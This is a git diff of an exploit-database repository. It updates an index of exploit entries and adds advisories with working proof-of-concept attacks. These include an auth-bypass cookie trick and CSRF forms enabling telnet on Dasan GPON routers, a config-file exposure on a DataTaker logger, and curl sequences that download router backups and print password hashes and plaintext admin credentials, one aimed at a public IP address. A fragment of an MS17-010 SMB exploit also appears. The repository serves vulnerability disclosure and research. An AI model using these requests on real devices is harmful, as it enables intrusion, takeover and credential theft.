diff --git a/files.csv b/files.csv index 58eda3b9b..8f0501a04 100644 --- a/files.csv +++ b/files.csv @@ -3423,7 +3423,7 @@ id,file,description,date,author,platform,type,port 26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service",2005-09-09,Shiraishi.M,linux,dos,0 26251,platforms/linux/dos/26251.c,"Snort 2.x - PrintTcpOptions Remote Denial of Service",2005-09-12,"VulnFact Security Labs",linux,dos,0 26271,platforms/osx/dos/26271.txt,"Apple Safari 1.x/2.0.1 - Data URI Memory Corruption",2005-09-17,"Jonathan Rockway",osx,dos,0 -26301,platforms/windows/dos/26301.txt,"Novell Groupwise 6.5.3 Client - Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0 +26301,platforms/windows/dos/26301.txt,"Novell Groupwise Client 6.5.3 - Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0 26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0 26322,platforms/windows/dos/26322.pl,"MusicBee 2.0.4663 - '.m3u' Denial of Service",2013-06-19,Chako,windows,dos,0 26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - IFRAME Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos,0 @@ -3979,7 +3979,7 @@ id,file,description,date,author,platform,type,port 31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 -31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 +31563,platforms/windows/dos/31563.txt,"SLmail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)",2008-04-08,Whitecell,windows,dos,0 31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service",2008-04-02,"The Hacker Webzine",windows,dos,0 31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection",2008-04-02,"The Hacker Webzine",windows,dos,0 @@ -7198,7 +7198,7 @@ id,file,description,date,author,platform,type,port 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0 -18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0 +18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Local Privilege Escalation",2012-05-22,sickness,windows,local,0 18917,platforms/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0 18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0 18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 @@ -8248,7 +8248,7 @@ id,file,description,date,author,platform,type,port 26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0 26409,platforms/windows/local/26409.py,"aSc Timetables 2013 - Stack Buffer Overflow",2013-06-24,Dark-Puzzle,windows,local,0 26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Direct Retn Buffer Overflow",2013-06-24,Onying,windows,local,0 -26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - nwfs.sys Privilege Escalation (Metasploit)",2013-06-24,Metasploit,windows,local,0 +26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - 'nwfs.sys' Privilege Escalation (Metasploit)",2013-06-24,Metasploit,windows,local,0 26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0 26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation (Metasploit)",2013-06-26,Metasploit,linux,local,0 26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - 'nicm.sys' Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local,0 @@ -8280,7 +8280,7 @@ id,file,description,date,author,platform,type,port 27065,platforms/linux/local/27065.txt,"Cray UNICOS /usr/bin/script - Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 27066,platforms/linux/local/27066.txt,"Cray UNICOS /etc/nu - '-c' Option Filename Processing Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 27168,platforms/qnx/local/27168.txt,"QNX 6.2/6.3 - Multiple Privilege Escalation / Denial of Service Vulnerabilities",2006-02-07,anonymous,qnx,local,0 -27191,platforms/windows/local/27191.py,"Novell Client 2 SP3 - Privilege Escalation",2013-07-29,sickness,windows,local,0 +27191,platforms/windows/local/27191.py,"Novell Client 2 SP3 - 'nicm.sys 3.1.11.0' Local Privilege Escalation",2013-07-29,sickness,windows,local,0 27231,platforms/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,linux,local,0 27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0 27285,platforms/hardware/local/27285.txt,"Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,local,0 @@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0 -41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0 +41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0 41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0 41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0 @@ -9357,7 +9357,7 @@ id,file,description,date,author,platform,type,port 627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143 636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow (2)",2004-11-16,NoPh0BiA,windows,remote,80 637,platforms/windows/remote/637.c,"TABS MailCarrier 2.51 - Remote Buffer Overflow",2004-11-16,NoPh0BiA,windows,remote,25 -638,platforms/windows/remote/638.py,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)",2004-11-18,muts,windows,remote,110 +638,platforms/windows/remote/638.py,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)",2004-11-18,muts,windows,remote,110 640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0 641,platforms/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 - File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0 644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow",2004-11-21,"Reed Arvin",windows,remote,110 @@ -10734,7 +10734,7 @@ id,file,description,date,author,platform,type,port 14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",win_x86,remote,80 14976,platforms/linux/remote/14976.txt,"YOPS - Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0 15001,platforms/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0 -15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0 +15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - 'call-back-url' Stack Overflow",2010-09-19,Abysssec,windows,remote,0 15005,platforms/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar - Email Address Stack Buffer Overflow",2010-09-14,"A. Plaskett",multiple,remote,0 15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0 15048,platforms/windows/remote/15048.txt,"SmarterMail 7.1.3876 - Directory Traversal",2010-09-19,sqlhacker,windows,remote,0 @@ -10955,7 +10955,7 @@ id,file,description,date,author,platform,type,port 16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,windows,remote,0 16397,platforms/windows/remote/16397.rb,"Lyris ListManager - MSDE Weak sa Password (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16402,platforms/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -13530,8 +13530,8 @@ id,file,description,date,author,platform,type,port 24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0 24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10 SP3/11 SP2 - Remote Execution (Metasploit)",2013-04-08,Metasploit,multiple,remote,0 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote,0 -643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)",2004-12-21,"Haroon Rashid Astwat",windows,remote,110 -646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)",2004-12-22,"Ivan Ivanovic",windows,remote,0 +643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)",2004-12-21,"Haroon Rashid Astwat",windows,remote,110 +646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)",2004-12-22,"Ivan Ivanovic",windows,remote,0 24944,platforms/windows/remote/24944.py,"Freefloat FTP Server 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0 24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0 24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0 @@ -15623,6 +15623,7 @@ id,file,description,date,author,platform,type,port 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0 42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80 +42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0 42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0 @@ -38127,4 +38128,9 @@ id,file,description,date,author,platform,type,port 42309,platforms/hardware/webapps/42309.txt,"Pelco Sarix/Spectra Cameras - Remote Code Execution",2017-07-10,LiquidWorm,hardware,webapps,0 42311,platforms/windows/webapps/42311.txt,"Pelco VideoXpert 1.12.105 - Directory Traversal",2017-07-10,LiquidWorm,windows,webapps,0 42312,platforms/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,windows,webapps,0 +42313,platforms/hardware/webapps/42313.txt,"DataTaker DT80 dEX 1.50.012 - Information Disclosure",2017-07-11,"Nassim Asrir",hardware,webapps,0 42314,platforms/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",linux,webapps,0 +42320,platforms/hardware/webapps/42320.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass",2017-07-13,LiquidWorm,hardware,webapps,0 +42321,platforms/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps,0 +42322,platforms/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps,0 +42323,platforms/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,hardware,webapps,0 diff --git a/platforms/hardware/webapps/42313.txt b/platforms/hardware/webapps/42313.txt new file mode 100755 index 000000000..73b213272 --- /dev/null +++ b/platforms/hardware/webapps/42313.txt @@ -0,0 +1,62 @@ +[+] Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure +[+] Credits / Discovery: Nassim Asrir +[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ +[+] Author Company: Henceforth +[+] CVE: CVE-2017-11165 + +Vendor: +=============== + +http://www.datataker.com/ + + +About: +======== + +The dataTaker DT80 smart data logger provides an extensive array of features that allow it to be used across a wide variety of applications. The DT80 is a robust, stand alone, low power data logger featuring USB memory stick support, 18 bit resolution, extensive communications capabilities and built-in display. + +The dataTaker DT80’s Dual Channel concept allows up to 10 isolated or 15 common referenced analog inputs to be used in many combinations. With support for multiple SDI-12 sensor networks, Modbus for SCADA systems, FTP and Web interface, 12V regulated output to power sensors, the DT80 is a totally self contained solution. + +Vulnerability Type: +=================== + +Sensitive Configurations Exposure. + + +issue: +=================== + +dataTaker dEX 1.350.012 allows remote attackers to obtain sensitive configuration information via +a direct request for the /services/getFile.cmd?userfile=config.xml URI. + +POC: +=================== + +http://victim/services/getFile.cmd?userfile=config.xml + + +Output: +======== + + + + + + + + + +etc.... + +username + +password + +21 + +arrdhor + +arrdhor + +YES + diff --git a/platforms/hardware/webapps/42320.txt b/platforms/hardware/webapps/42320.txt new file mode 100755 index 000000000..f28dac194 --- /dev/null +++ b/platforms/hardware/webapps/42320.txt @@ -0,0 +1,57 @@ +Dasan Networks GPON ONT WiFi Router H64X Series Authentication Bypass + + +Vendor: Dasan Networks +Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu +Affected version: Model: H640GR-02 + H640GV-03 + H640GW-02 + H640RW-02 + H645G + Firmware: 2.76-9999 + 2.76-1101 + 2.67-1070 + 2.45-1045 + +Summary: H64xx is comprised of one G-PON uplink port and four ports +of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It +helps service providers to extend their core optical network all the +way to their subscribers, eliminating bandwidth bottlenecks in the +last mile. H64xx is integrated device that provide the high quality +Internet, telephony service (VoIP) and IPTV or OTT content for home +or office. H64xx enable the subscribers to make a phone call whose +quality is equal to PSTN at competitive price, and enjoy the high +quality resolution live video and service such as VoD or High Speed +Internet. + +Desc: The vulnerable device does not properly perform authentication +and authorization, allowing it to be bypassed through cookie manipulation. +Setting the Cookie 'Grant' with value 1 (user) or 2 (admin) will +bypass security controls in place enabling the attacker to take full +control of the device management interface. + +Tested on: Server: lighttpd/1.4.31 + Server: DasanNetwork Solution + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5421 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5421.php + + +19.05.2017 + +-- + + +GET /cgi-bin/sysinfo.cgi HTTP/1.1 +Host: 192.168.0.1:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Bond-James-Bond/007 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +Cookie: Grant=1; Language=english; silverheader=3c +Connection: close diff --git a/platforms/hardware/webapps/42321.txt b/platforms/hardware/webapps/42321.txt new file mode 100755 index 000000000..914e8d316 --- /dev/null +++ b/platforms/hardware/webapps/42321.txt @@ -0,0 +1,85 @@ +Dasan Networks GPON ONT WiFi Router H64X Series Cross-Site Request Forgery + + +Vendor: Dasan Networks +Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu +Affected version: Model: H640GR-02 + H640GV-03 + H640GW-02 + H640RW-02 + H645G + Firmware: 3.03p1-1145 + 3.03-1144-01 + 3.02p2-1141 + 2.77p1-1125 + 2.77-1115 + 2.76-9999 + 2.76-1101 + 2.67-1070 + 2.45-1045 + +Summary: H64xx is comprised of one G-PON uplink port and four ports +of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It +helps service providers to extend their core optical network all the +way to their subscribers, eliminating bandwidth bottlenecks in the +last mile. H64xx is integrated device that provide the high quality +Internet, telephony service (VoIP) and IPTV or OTT content for home +or office. H64xx enable the subscribers to make a phone call whose +quality is equal to PSTN at competitive price, and enjoy the high +quality resolution live video and service such as VoD or High Speed +Internet. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain, if not all actions +with administrative privileges if a logged-in user visits a malicious +web site. + +Tested on: Server: lighttpd/1.4.31 + Server: DasanNetwork Solution + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5422 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5422.php + + +19.05.2017 + +-- + + +Enable telnet access (disable telnet blocking): +Enable web access (disable web blocking): +----------------------------------------------- + + + + +
+ + + + +
+ + + + + +Increase session timeout (0: disable, min: 1, max: 60): +------------------------------------------------------- + + + + +
+ + +
+ + + diff --git a/platforms/hardware/webapps/42322.txt b/platforms/hardware/webapps/42322.txt new file mode 100755 index 000000000..a638de16b --- /dev/null +++ b/platforms/hardware/webapps/42322.txt @@ -0,0 +1,60 @@ +Dasan Networks GPON ONT WiFi Router H64X Series Privilege Escalation + + +Vendor: Dasan Networks +Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu +Affected version: Model: H640GR-02 + H640GV-03 + H640GW-02 + H640RW-02 + H645G + Firmware: 2.77-1115 + 2.76-9999 + 2.76-1101 + 2.67-1070 + 2.45-1045 + +Summary: H64xx is comprised of one G-PON uplink port and four ports +of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It +helps service providers to extend their core optical network all the +way to their subscribers, eliminating bandwidth bottlenecks in the +last mile. H64xx is integrated device that provide the high quality +Internet, telephony service (VoIP) and IPTV or OTT content for home +or office. H64xx enable the subscribers to make a phone call whose +quality is equal to PSTN at competitive price, and enjoy the high +quality resolution live video and service such as VoD or High Speed +Internet. + +Desc: The application suffers from a privilege escalation vulnerability. +A normal user can elevate his/her privileges by changing the Cookie 'Grant' +from 1 (user) to 2 (admin) gaining administrative privileges and revealing +additional functionalities or additional advanced menu settings. + +Tested on: Server: lighttpd/1.4.31 + Server: DasanNetwork Solution + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5423 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5423.php + + +19.05.2017 + +-- + + +Change cookie Grant=1 (user) to Grant=2 (admin): +------------------------------------------------ + +GET /cgi-bin/index.cgi HTTP/1.1 +Host: 192.168.0.1:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Bond-James-Bond/007 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +Cookie: Grant=2; Language=macedonian; silverheader=3c +Connection: close diff --git a/platforms/hardware/webapps/42323.txt b/platforms/hardware/webapps/42323.txt new file mode 100755 index 000000000..bc7c4ecc6 --- /dev/null +++ b/platforms/hardware/webapps/42323.txt @@ -0,0 +1,140 @@ +Dasan Networks GPON ONT WiFi Router H64X Series System Config Download + + +Vendor: Dasan Networks +Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu +Affected version: Models: H640GR-02 + H640GV-03 + H640GW-02 + H640RW-02 + H645G + Firmware: 3.02p2-1141 + 2.77p1-1125 + 2.77-1115 + 2.76-9999 + 2.76-1101 + 2.67-1070 + 2.45-1045 + +Versions 3.03x are not affected by this issue. +The running.CFG/wifi.CFG backup files are now 7z password protected. + + +Summary: H64xx is comprised of one G-PON uplink port and four ports +of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It +helps service providers to extend their core optical network all the +way to their subscribers, eliminating bandwidth bottlenecks in the +last mile. H64xx is integrated device that provide the high quality +Internet, telephony service (VoIP) and IPTV or OTT content for home +or office. H64xx enable the subscribers to make a phone call whose +quality is equal to PSTN at competitive price, and enjoy the high +quality resolution live video and service such as VoD or High Speed +Internet. + +Desc: The system backup configuration file 'running.CFG' and the wireless +backup configuration file 'wifi.CFG' can be downloaded by an attacker +from the root directory in certain circumstances. This will enable the +attacker to disclose sensitive information and help her in authentication +bypass, privilege escalation and/or full system access. + +Tested on: Server: lighttpd/1.4.31 + Server: DasanNetwork Solution + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5424 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5424.php + + +19.05.2017 + +-- + + +------------------- +#1 This PoC request is assuming that the admin or a user created a backup. This is done by first issuing a request +to: /cgi-bin/backuprecoversystembackup_action.cgi or /cgi-bin/backuprecoverwifibackup_action.cgi scripts that +instructs the web server to generate the running.CFG or wifi.CFG gziped files respectively. + + +curl http://192.168.0.1/running.CFG -# | gunzip > dasan_output.txt ; strings dasan_output.txt | grep -rn 'admin:' +######################################################################## 100.0% +(standard input):180:admin:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:admin:/etc:/bin/sh +(standard input):1442:admin:admin123:2 + +bash-4.4$ curl http://192.168.0.1/running.CFG -# | gunzip > dasan_output.txt ; strings dasan_output.txt | grep -rn 'root:' +######################################################################## 100.0% +(standard input):181:root:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:root:/etc:/bin/sh +(standard input):191:root:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:14987:0:99999:7::: +bash-4.4$ + +Notice the same hard-coded shell credentials for admin and root user. +Left for the viewer to exercise 'cracking the perimeter'. ;] + +------------------- +#2 This PoC request will do an authentication bypass using the Grant cookie to create the running.CFG file. +In this request we're using Grant=1 with the account 'user' which by default has the password: user. After that, +decompressing the file, navigating to 'etc' extracted directory and reading 'web_user' file which can then +escalate privileges by reading the admin password and loggin-in. + + +bash-4.4$ curl http://192.168.0.1/cgi-bin/backuprecoversystembackup_action.cgi --cookie "silverheader=0c; Grant=1; Language=english" -H "X-Requested-With: XMLHttpRequest" ; sleep 5 +bash-4.4$ curl http://192.168.0.1/running.CFG -vv --cookie "silverheader=0c; Grant=1; Language=english" -O + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed + 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.0.1... +* TCP_NODELAY set +* Connected to 192.168.0.1 (192.168.0.1) port 80 (#0) +> GET /running.CFG HTTP/1.1 +> Host: 192.168.0.1 +> User-Agent: curl/7.51.0 +> Accept: */* +> Cookie: silverheader=0c; Grant=1; Language=english +> +< HTTP/1.1 200 OK +< Content-Type: application/octet-stream +< Accept-Ranges: bytes +< ETag: "2477069903" +< Last-Modified: Wed, 12 Jul 2017 19:14:18 GMT +< Content-Length: 10467 +< Date: Thu, 13 Jul 2017 00:56:14 GMT +< Server: lighttpd/1.4.31 +< +{ [1208 bytes data] + 53 10467 53 5528 0 0 5974 0 0:00:01 --:--:-- 0:00:01 5969* Curl_http_done: called premature == 0 +100 10467 100 10467 0 0 11290 0 --:--:-- --:--:-- --:--:-- 11279 +* Connection #0 to host 192.168.0.1 left intact +bash-4.4$ file running.CFG +running.CFG: gzip compressed data, last modified: Wed Jul 12 19:12:36 2017, max compression, from Unix +bash-4.4$ gunzip -v -d --suffix .CFG running.CFG ; tar -xf running ; cd etc ; cat web_user +running.CFG: 85.6% -- replaced with running +admin:admin123:2 +user:user:1 +bash-4.4$ + +Or just: + +bash-4.4$ curl -O http://180.148.2.139/running.CFG +bash-4.4$ tar -zxf running.CFG +bash-4.4$ cd etc +bash-4.4$ ls +INPUT_FILTER.conf fire_wall.conf lan_static_ip.conf ntp.conf radvd_param.conf upnpigd.conf +INPUT_REMOTE_ACCESS.conf fire_wall.sh lighttpd.conf other_security_status.sh remote_mgmt.conf user_ipv6tables.conf +dasan_output.txt hostname localtime passwd routing_entry.conf user_wan_cfg.conf +dhcp_client_dns.sh inet_check_file mac_filter.conf port_forward.conf shadow wan_ppp_mode.conf +dhcp_client_dynamic_default_dns.conf ipupdate.conf mac_source_match.conf port_forward.sh snmp web-enable +dhcpv6d.conf ipv6_route.conf multi_language.conf port_forward_dnat.sh snmp_status.conf web_user +dhcpv6d_param.conf is_safe_nat_option nat_route.conf port_forward_gre.sh sys_login_max_num webrefreshtime.conf +dmz.conf lan_dhcp_model.sh net_rest.conf ppp syslog.confx websesstime.conf +ds_mode_config lan_dhcp_server_static_ip.conf ns_ftp.conf radvd.conf udhcpd.conf +bash-4.4$ cat web_user +admin:admin123:2 +user:user:1 +bash-4.4$ cat ./.config/ds_user_pw +admin +bash-4.4$ cat passwd +admin:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:admin:/etc:/bin/sh +root:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:root:/etc:/bin/sh diff --git a/platforms/windows/remote/42315.py b/platforms/windows/remote/42315.py index efda10714..79f3ae175 100755 --- a/platforms/windows/remote/42315.py +++ b/platforms/windows/remote/42315.py @@ -458,7 +458,7 @@ def exploit(target, pipe_name): return True def smb_pwn(conn): - smbConn = smbconnection.SMBConnection(conn.get_remote_host(), conn.get_remote_host(), existingConnection=conn, manualNegotiate=True) + smbConn = conn.get_smbconnection() print('creating file c:\\pwned.txt on the target') tid2 = smbConn.connectTree('C$') @@ -466,10 +466,15 @@ def smb_pwn(conn): smbConn.closeFile(tid2, fid2) smbConn.disconnectTree(tid2) - #service_exec(smbConn, r'cmd /c copy c:\pwned.txt 